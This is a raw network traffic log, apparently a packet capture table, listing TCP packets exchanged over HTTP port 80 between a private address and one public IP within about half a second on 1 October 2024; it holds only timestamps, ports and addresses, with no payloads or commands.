                          Oct 1, 2024 07:38:14.366857052 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366871119 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366884947 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366899967 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366908073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.366908073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.366908073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.366908073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.366908073 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.366914988 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366930008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366944075 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366956949 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366971016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.366986036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367000103 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367011070 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367011070 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367011070 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367011070 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367011070 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367014885 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367029905 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367043972 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367059946 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367074013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367089987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367104053 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367120981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367124081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367124081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367124081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367124081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367124081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.367476940 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367491007 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367506027 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367520094 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.367535114 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543329954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543329954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543329954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543329954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543346882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543369055 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543394089 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543411016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543421984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543427944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543521881 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543535948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543560028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543574095 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543585062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543585062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543585062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543585062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543590069 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543605089 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543620110 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.543663025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543663025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543663025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543663025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.543663025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.585433006 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585457087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585472107 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585486889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585501909 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585522890 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585539103 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585556984 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.585732937 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.585732937 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630008936 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630058050 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630072117 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630088091 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630104065 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630119085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630134106 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630146980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630166054 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630214930 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630230904 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630273104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630287886 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630301952 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630326033 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630341053 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630353928 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630381107 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630387068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630387068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630387068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630387068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630388021 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630404949 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630420923 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630435944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630450010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630465984 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630480051 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630485058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630485058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630485058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630485058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630485058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630505085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630518913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630533934 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630588055 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630614042 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630628109 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630640984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630640984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630640984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630640984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630640984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630650997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630667925 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630682945 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630698919 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630712986 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630727053 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630764961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630772114 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630772114 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630772114 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630772114 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630772114 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630781889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630796909 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630812883 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630827904 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630851984 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630867004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630883932 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630899906 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630913019 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630913019 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630913019 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630913019 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630913019 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.630916119 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630947113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630961895 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630978107 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.630992889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631009102 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631030083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631025076 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631025076 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631025076 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631025076 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631025076 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631047010 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631098032 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631098032 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631114006 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631129980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631159067 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631160975 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631174088 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631175041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631190062 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631205082 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631220102 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631230116 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631230116 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631230116 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631234884 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631251097 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631266117 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631283998 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631284952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631284952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631299973 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631315947 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631315947 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631409883 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631409883 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631426096 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631444931 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631460905 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631475925 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631491899 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631506920 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631520987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631541014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631548882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631548882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631548882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631548882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631548882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631558895 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631577015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631601095 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631617069 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631633043 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631647110 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631663084 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631670952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631670952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631670952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631670952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631670952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631676912 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631691933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631731033 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631745100 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631761074 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631788969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631788969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631788969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631788969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631788969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.631886959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631901026 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631916046 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631930113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631947041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631961107 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631975889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.631990910 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632004976 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632014990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632014990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632014990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632014990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632014990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632020950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632036924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632051945 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632066011 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632085085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632098913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632114887 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632133007 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632148027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632148027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632148027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632148027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632148027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632148981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632190943 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632205009 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632220984 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632236004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632251024 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632266045 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.632267952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632267952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632268906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632268906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.632280111 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.633111954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.633111954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.674182892 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674220085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674237967 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674252987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674268961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674283981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674302101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674314976 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.674365044 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.674365044 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.674365044 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.674365044 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.718873978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.718908072 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.718933105 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.718949080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.718964100 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.718980074 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.718985081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.718985081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.718995094 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719019890 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719019890 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719022989 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719038010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719043970 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719064951 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719069004 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719082117 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719083071 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719098091 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719109058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719120979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719122887 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719136000 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719141006 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719151020 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719167948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719170094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719182014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719182968 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719197035 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719202995 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719214916 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719228983 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719239950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719248056 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719264030 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719264984 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719288111 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719291925 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719302893 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719311953 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719316959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719320059 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719332933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719346046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719348907 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719363928 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719373941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719388962 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719398022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719400883 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719408035 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719417095 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719441891 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719445944 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719465971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719470978 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719487906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719491959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.719499111 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.719507933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896876097 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.896882057 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896897078 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896909952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.896919966 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896934032 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.896935940 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896950960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896962881 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.896965981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896981955 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.896991014 CEST4970480192.168.2.8192.210.215.11
